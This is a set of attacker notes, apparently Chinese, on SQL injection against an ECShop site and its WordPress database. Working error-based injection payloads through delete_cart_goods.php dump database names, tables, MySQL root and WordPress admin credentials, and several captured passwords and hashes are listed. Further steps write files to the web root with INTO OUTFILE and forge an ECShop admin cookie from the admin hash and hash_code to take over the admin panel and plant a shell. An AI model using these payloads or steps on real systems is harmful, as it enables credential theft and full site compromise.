ecshop hash登录 + wordpress mysql盲注字段
delete_cart_goods.php post id=a *
sq_xfkjbd
暴库
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
73715F78666B6A6264
爆表
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x73715F78666B6A6264 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ecs_ad
ecs_ad_user
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x415256303332 and table_name=0x706870636D735F6D656D626572 limit 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x27,0x7e) from mysql limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
root zailai1ping'root
id=a and(select 1 from(select count(*),concat((select (select (select concat(0x7e,password,0x27,user,0x27,0x7e) from mysql.user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
id=a and(select 1 from(select count(*),concat((select (select (select concat(0x7e,password,0x27,user,0x27,0x7e) from sq_xfkjbd.wp_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
wp_users
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user_pass,0x27,0x27,0x7e) from sq_xfkjbd.wp_users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1、/wp-includes/registration-functions.php
2、/wp-includes/user.php
3、/wp-admin/admin-functions.php
4、/wp-admin/upgrade-functions.php
5、/wp-content/themes/v7v3_qiyecms7/index.php
pwordpress 爆绝对路径C:\wamp\www\cookery\wp-includes\
http://www.xxxx.com/cookery/log.php
ecs_shop_config
admin
44c2c3bb5349da02cc24d0dee40d27aa31693422540744c0a6b6da635b7a5a93
root
zailai1ping
353xxxx
$P$BxnaUT.BR/S3inHmDNZyyyJeYpNzHB0
select '' into outfile 'C://wamp//www/cookery//log.php'
ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是 31693422540744c0a6b6da635b7a5a93
先记住 管理hash +hash_code =c81e629defd086d9ace797987caa76f4 (一起编码转换为32位)
最后得到
ECSCP[admin_id]=1; ECSCP[admin_pass]=c81e629defd086d9ace797987caa76f4;ECS[visit_times]=2; ECS_ID=e4ad4c650ef82ef53ff93cd5149098c531ce8dc8; bdshare_firstime=1376041144528
post 提交访问 admin/index.php 进入后台 拿shell的话!
还不懂看 : http://qqhack8.blog.163.com/blog/static/11414798520137112258776/
select '' into outfile 'C://wamp//www/cookery//loginn.php'
